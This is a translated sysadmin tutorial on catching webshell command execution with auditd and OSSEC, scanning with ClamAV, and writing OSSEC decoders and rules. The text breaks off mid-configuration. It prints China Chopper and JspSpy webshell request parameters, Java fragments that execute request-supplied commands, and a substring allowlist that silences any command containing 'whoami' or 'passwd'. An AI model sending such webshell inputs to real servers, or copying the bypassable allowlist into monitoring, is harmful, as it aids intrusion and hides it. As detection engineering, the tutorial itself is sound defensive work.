
Monitoring Java command execution with auditd on Linux and alerting through OSSEC

0x01 Introduction to the auditd service
auditd is the audit system that ships with Linux. It records audit information and, from a security standpoint, can be used to monitor security events on the system.
Its rules file is /etc/audit/audit.rules, in which every rule and watch must sit on its own line. The syntax is:

-a <list>,<action> <options>

<list> is one of the following:

task
Per-task list. Used only when a task is created. Only fields that are known at creation time (such as uid) can be used in this list.
entry
System-call entry list. Used on entry to a system call to decide whether an audit record should be created.
exit
System-call exit list. Used on exit from a system call to decide whether an audit record should be created.
user
User-message filter list. The kernel uses it to filter user-space events before passing them to the audit daemon. The only valid fields are uid, auid, gid and pid.
exclude
Event-type exclusion filter list. Used to filter out events the administrator does not want to see; the msgtype field names the message types that should not be logged.

<action> is one of the following:

never
Do not generate an audit record.
always
Allocate an audit context, always fill it in at system-call entry, and always write an audit record at system-call exit. If the program uses this system call, an audit record is started.

<options> are as follows:

-S <syscall>
Specify a system call by name or number. Use all as the name to select every system call.
-F <name[=,!=,<,>,<=]value>
Specify a rule field. When several fields are given for one rule, an audit record is started only if all of them are true. Every field is introduced with -F, and up to 64 may be specified.
Commonly used fields:
pid
Process ID.
ppid
Process ID of the parent process.
uid
User ID.
gid
Group ID.
msgtype
Message type number. Only valid on the exclude filter list.
arch
Processor architecture of the system call. Give an exact architecture such as i686 (as reported by uname -m), or b32 to use the 32-bit system-call table, or b64 to use the 64-bit system-call table.
...

0x02 Writing a test rule to monitor Java command execution
JBoss is started as the nobody account, so add audit rules for that user:

# grep '\-a' /etc/audit/audit.rules 
-a exclude,always -F msgtype=CONFIG_CHANGE
-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

The rule above matches only the 32-bit system-call table (arch=b32); a 64-bit JVM calls execve through the 64-bit table, so the same rule with -F arch=b64 should be added alongside it. Restart the service:

# service auditd restart
Stopping auditd: [ OK ]
Starting auditd: [ OK ]

Test with webshells:
1) China Chopper (caidao) shell
The parameters sent by the Chopper shell are

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

The server-side code that runs them:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

The resulting audit log:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F70726F6A6563742F7A616F6A69617379732E6A69616E73686539392E636F6D2E636563616F707379732F636563616F707379732F3B77686F616D693B6563686F205B535D3B7077643B6563686F205B455D

2) JspSpy
The parameters sent by JspSpy are

o=shell&type=command&command=netstat+-antlp&submit=Execute

The server-side code that runs them:

String type = request.getParameter("type");
if (type.equals("command")) {
ins.get("vs").invoke(request,response,JSession);
out.println("<div style='margin:10px'><hr/>");
out.println("<pre>");
String command = request.getParameter("command");
if (!Util.isEmpty(command)) {
Process pro = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String s = reader.readLine();

The resulting audit log:

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"

0x03 OSSEC monitoring configuration
OSSEC already ships a decoder for auditd events, for example:

<decoder name="auditd">
  <prematch>^type=</prematch>
</decoder>
.......

But there is no ready-made rule for it under rules/, so edit local_rules.xml and add:

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

Test:

[root@localhost ossec]# ./bin/ossec-logtest 
2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.
2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).
ossec-testrule: Type one log per line.

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"


**Phase 1: Completed pre-decoding.
       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

**Phase 2: Completed decoding.
       decoder: 'auditd'

**Phase 3: Completed filtering (rules).
       Rule id: '110001'
       Level: '10'
       Description: 'Java execution command'
**Alert to be generated.

Then add the file to be monitored on the agent side:

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/audit/audit.log</location>
  </localfile>

Now when JspSpy executes a system command, the following alert appears:

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log 
** Alert 1500280231.400419: mail  - syslog,auditd,
2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log
Rule: 110001 (level 10) -> 'Java execution command'
type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

One more issue to consider is whitelisting: some of the company's sites legitimately invoke system commands themselves, for example for video processing. To avoid false positives a whitelist is needed.
Edit local_rules.xml again, add a whitelist rule and place it above the EXECVE rule:

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="0">
    <if_sid>110000</if_sid>
    <regex>whoami|passwd</regex>
    <description>Java execution white list</description>
  </rule>
  <rule id="110002" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

As shown above, running whoami or cat /etc/passwd no longer generates an alert.
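As an added example (not part of the original post), the following Python script parses audit EXECVE records the way the OSSEC rule sees them, decodes the hex-encoded arguments auditd emits for values containing spaces or quotes (as in the Chopper log above), and applies the allowlist to the complete decoded argument vector rather than to a substring, so a record whose arguments merely contain an allowlisted word still alerts. The sample records and the allowlist entries are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample records, modelled on the EXECVE lines shown above. auditd
# hex-encodes an argument that contains whitespace or quotes, which is why a2 of
# the first record is a bare hex string (it decodes to "cd /tmp;id").
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F746D703B6964
type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"
type=EXECVE msg=audit(1500280229.507:7665): argc=2 a0="cat" a1="/etc/passwd"
type=SYSCALL msg=audit(1500280229.507:7665): arch=40000003 syscall=11 success=yes exit=0 uid=99
"""

# Complete argument vectors the application is known to run legitimately
# (constructed for the example; an exact match is required, not a substring).
ALLOWLIST = {
    ("whoami",),
    ("cat", "/etc/passwd"),
}

_EVENT_RE = re.compile(r"msg=audit\((\d+)\.(\d+):(\d+)\)")
_ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def decode_audit_value(quoted: Optional[str], hexval: Optional[str]) -> str:
    """auditd writes plain values in double quotes and unsafe ones as hex."""
    if quoted is not None:
        return quoted
    return bytes.fromhex(hexval).decode("utf-8", errors="replace")


def parse_execve(line: str) -> Optional[Dict]:
    """Return the event id and decoded argv for one EXECVE record, else None."""
    if not line.startswith("type=EXECVE "):
        return None
    ev = _EVENT_RE.search(line)
    if ev is None:
        return None
    argv: Dict[int, str] = {}
    for m in _ARG_RE.finditer(line):
        argv[int(m.group(1))] = decode_audit_value(m.group(2), m.group(3))
    argc_m = re.search(r"\bargc=(\d+)", line)
    argc = int(argc_m.group(1)) if argc_m else len(argv)
    # Arguments longer than auditd's limit are split into a2[0], a2[1], ...;
    # those records are not reassembled here and are flagged as incomplete.
    complete = sorted(argv) == list(range(argc))
    return {
        "event_id": f"{ev.group(1)}.{ev.group(2)}:{ev.group(3)}",
        "argv": [argv[i] for i in sorted(argv)],
        "complete": complete,
    }


def scan_audit_log(text: str, allowlist=ALLOWLIST) -> List[Dict]:
    """Parse every EXECVE record and mark the ones that are not allowlisted."""
    events: List[Dict] = []
    for line in text.splitlines():
        rec = parse_execve(line)
        if rec is None:
            continue
        # An incomplete argv can never be proven benign, so it always alerts.
        rec["alert"] = (not rec["complete"]) or tuple(rec["argv"]) not in allowlist
        events.append(rec)
    return events


if __name__ == "__main__":
    for e in scan_audit_log(SAMPLE_AUDIT_LOG):
        flag = "ALERT" if e["alert"] else "allow"
        print(f"{flag} {e['event_id']} {e['argv']}")
```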

 

Deploying ClamAV on Linux and alerting through OSSEC

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

After installation the virus database has to be updated.
The updater is /usr/bin/freshclam.
Its default configuration file is /etc/freshclam.conf, with the following content:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
/var/lib/clamav # location of the virus database
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net # mirror used for database updates
DatabaseMirror db.local.clamav.net # mirror used for database updates

Modify the configuration as follows:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

Then update the virus database:

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

daily.cld and daily.cvd contain the same data; daily.cvd is a compressed file and daily.cld is not.
freshclam checks whether a new update has been published since the last check. If so it downloads the diff files, and if the diff download fails it downloads a complete, current daily.cvd.

ClamAV installs a daily cron job, /etc/cron.daily/freshclam, that refreshes the database every day:

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

 

Once the database is updated, run a scan.
The idea is that OSSEC already ships decoders and rules for ClamAV scan results.
etc/decoder.xml contains:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml contains:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

The decoder shows that OSSEC matches on the program name clamd in the syslog header, so the scan results must be in syslog format before they can be parsed; the default -l log option does not write syslog format, as the following test shows.
The test directory holds some sample files; I copied a file collected during an earlier incident response into /tmp:

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

Looking at /var/log/clamav.log, the output is not in syslog format:

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

/etc/clamd.conf contains a LogSyslog parameter:

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

Syslog output can be enabled there (it goes to the local6 facility by default), but testing showed that this configuration file is not loaded by default, so settings written to it have no effect. Instead, logger is used to emit syslog.
Adjust the rsyslog configuration:

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages # add local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

Now have OSSEC monitor this file by adding:

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

The resulting alert:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

Four more issues need to be considered.
1) How to whitelist signatures
Create the file whitelist-signatures.ign2 in the database directory.
Taking Dirty COW as an example, add the line: Unix.Exploit.CVE_2016_5195-2

2) Symlinks: are files scanned twice?

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0 means symlinks are never followed; 1 means they are followed only when the file is passed to clamscan directly on the command line; 2 means they are always followed. The default is 1.
Create a symlink to test:

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

With follow-file-symlinks=0 the symlinked file is not detected:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With follow-file-symlinks=1 and no file passed explicitly, the symlinked file is not detected:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With follow-file-symlinks=1 and /tmp/makeudp passed explicitly, the symlinked file is detected:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With follow-file-symlinks=2 the symlinked file is detected:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

So symlinked files are not scanned by default.
3) Many machines mount network storage, and those directories need to be excluded.
This is done with --exclude-dir="^/sys".
Mounts whose filesystem begins with 10. or 192. are excluded as follows:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4) Because the cron job runs in the small hours every day, a scan that reaches the storage devices may well not finish within a day. The script therefore has to check whether a scan is still running and skip if so. Such excessively long scans also need to be alerted on, so add an OSSEC rule that alerts when the scan time exceeds 6 hours.
Add to rules/clam_av_rules.xml:

  <rule id="52510" level="7">
    <if_sid>52500</if_sid>
    <match>Time: </match>
    <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
    <description>ClamAV scan time over 6hours</description>
  </rule>

PS: the regex cannot be written as \d{4} here, nor with [1-9]; neither matches, because OSSEC's own regex syntax supports neither {n} repetition counts nor [] character classes, only escapes such as \d, \w and \s combined with * and +.
Then test the OSSEC alert:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.
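As an added example (not the post's own code), here is a Python equivalent of rules 52502 and 52510 that pre-decodes the syslog-wrapped clamd lines shown above and compares the scan time numerically, which the OSSEC regex cannot do; the sample log lines are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of clamscan output piped through
# `logger -it clamd -p local6.notice`, in the format shown above.
SAMPLE_CLAMAV_SYSLOG = """\
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:29:14 localhost clamd[2077]: /tmp/notes.txt: OK
Jul 14 11:29:15 localhost clamd[2077]: ----------- SCAN SUMMARY -----------
Jul 14 11:29:15 localhost clamd[2077]: Infected files: 1
Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)
Jul 15 02:00:09 localhost clamd[2301]: Time: 9.050 sec (0 m 9 s)
Jul 15 02:00:10 localhost freshclam[2310]: Database updated (6300501 signatures)
"""

SCAN_TIME_LIMIT_MINUTES = 6 * 60  # the 6-hour threshold of rule 52510

# Syslog header: timestamp, host, program[pid]: message (OSSEC's pre-decoding fields)
_SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
_FOUND_RE = re.compile(r"^(?P<path>.+?): (?P<sig>\S+) FOUND$")
_TIME_RE = re.compile(r"^Time: [\d.]+ sec \((?P<min>\d+) m (?P<sec>\d+) s\)$")


def pre_decode(line: str) -> Optional[Dict[str, str]]:
    """Split one syslog line into the fields OSSEC's pre-decoder extracts."""
    m = _SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def clamd_alerts(text: str, limit_minutes: int = SCAN_TIME_LIMIT_MINUTES) -> List[Dict]:
    """Emulate rules 52502 (virus found) and 52510 (scan too long) over clamd syslog lines."""
    alerts: List[Dict] = []
    for line in text.splitlines():
        rec = pre_decode(line)
        # The clamd decoder matches on program_name ^clamd; other programs are ignored.
        if rec is None or not rec["prog"].startswith("clamd"):
            continue
        found = _FOUND_RE.match(rec["msg"])
        if found:
            alerts.append({"ts": rec["ts"], "rule": "virus_detected", "level": 8,
                           "path": found["path"], "signature": found["sig"]})
            continue
        t = _TIME_RE.match(rec["msg"])
        if t:
            minutes = int(t["min"])
            # A numeric comparison replaces the enumerated \(36\d |\(37\d |... alternatives
            if minutes >= limit_minutes:
                alerts.append({"ts": rec["ts"], "rule": "scan_time_exceeded", "level": 7,
                               "minutes": minutes})
    return alerts


if __name__ == "__main__":
    for a in clamd_alerts(SAMPLE_CLAMAV_SYSLOG):
        print(a)
```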

 

The final cron script:

#!/bin/bash

# Directories that are never scanned: pseudo filesystems, data and upload trees
WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"

# Do not start a new scan while the previous one is still running
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi

# Mount points of network storage (filesystems whose name begins with 10. or 192.)
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

# Append the network mounts to the exclusion list when any were found
if [[ -n $NFSDIR ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi

# Results go to syslog facility local6 under the program name clamd so the OSSEC decoder matches them
COMMAND="/usr/bin/clamscan -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi

 

[OSSEC] Log decoding and alert rule configuration

OSSEC is an open-source, multi-platform intrusion detection system that runs on Windows, Linux, OpenBSD/FreeBSD and macOS. It includes log analysis, integrity checking and rootkit detection.

1. Testing and validating OSSEC decoders and alert rules

OSSEC ships a tool, ossec-logtest, for testing decoders and alert rules. It is normally installed in /var/ossec/bin.

Example:

 

/var/ossec/bin/ossec-logtest
2014/06/11 13:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

As shown above, when the log line

Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

is entered, it passes through three phases and generates a level 4 alert with rule ID 10100 and the description "First time user logged in."

Running ossec-logtest -v gives a more detailed trace of the analysis logic.

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. Custom decoders
2.1 Adding a log source

Adding a log source is simple: edit /var/ossec/etc/ossec.conf.

For a local file, add the following:

<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

For a remote syslog source, add the following:

<remote>
  <connection>syslog</connection>
  <protocol>udp</protocol>
  <port>2514</port>
  <allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 Creating a custom decoder

Suppose we have the following two log lines:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

Analysing them with ossec-logtest gives:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

So OSSEC performs two normalization stages when analysing a log line: pre-decoding and decoding.

Pre-decoding is built into OSSEC: for any standard syslog line it extracts the following four basic fields.

Timestamp: Jun 11 22:06:30
Hostname: 172.17.153.38/172.16.24.32
Program_name: /usr/bin/auditServerd
Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .

In the decoding stage the user can define custom decoders by editing /var/ossec/etc/decoder.xml, for example by adding the following:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

Run /var/ossec/bin/ossec-logtest again:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

The line now hits the decoder named auditServerd, which correctly identifies it as output of the auditServerd program.

On top of the auditServerd decoder we can add child decoders to extract more information, for example:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>
<decoder name="auditServerd-login">
  <parent>auditServerd</parent>
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>
  <order>user,status,srcip,dstip,dstport</order>
</decoder>

Run /var/ossec/bin/ossec-logtest again and more fields are extracted:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status: 'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.

By configuring such regular expressions the user extracts specific fields for later correlation analysis. OSSEC has 14 built-in fields that can be extracted:

   - location - where the log came from (only on FTS)
   - srcuser  - extracts the source username
   - dstuser  - extracts the destination (target) username
   - user     - an alias to dstuser (only one of the two can be used)
   - srcip    - source ip
   - dstip    - dst ip
   - srcport  - source port
   - dstport  - destination port
   - protocol - protocol
   - id       - event id
   - url      - url of the event
   - action   - event action (deny, drop, accept, etc)
   - status   - event status (success, failure, etc)
   - extra_data     - Any extra data

3. Custom alert rules

3.1 Rule file paths

The rule files live in /var/ossec/rules/ by default. To load a rule file it must be listed in /var/ossec/etc/ossec.conf; the default configuration is:

<ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>
    ......
    <include>clam_av_rules.xml</include>
    <include>bro-ids_rules.xml</include>
    <include>dropbear_rules.xml</include>
    <include>local_rules.xml</include>
  </rules>
</ossec_config>  <!-- rules global entry -->

The following configuration instead loads every rule file under /var/ossec/rules:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

Decoders can likewise be loaded through the decoder_dir element, for example:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

This configuration adds every xml file under /var/ossec/rules/plugins/decoders as an OSSEC decoder.

For more detailed configuration and syntax, see:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

 

3.2 Configuring OSSEC alert rules

For example, to add alert rules for the auditServerd program we create a new rule file for it; for programs that already have rule files in OSSEC (sshd, openbsd, vsftpd and so on) we simply add to or modify the corresponding file.

First create the file

/var/ossec/rules/auditServerd_rules.xml

with the following content:

<group name="auditServer,">
  <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>
</group>

In the rules above, rule 80000 groups and counts the logs: whenever a line is decoded as auditServerd it is assigned to the auditServer group and the state-machine counter is incremented by 1.

Rule 80001 fires when user is blackrat and srcip is 172.17.153.36, raising the alert "User blackrat is not allowed login from 172.17.153.36!".

Add the file to /var/ossec/etc/ossec.conf:

  …
    <include>dropbear_rules.xml</include>
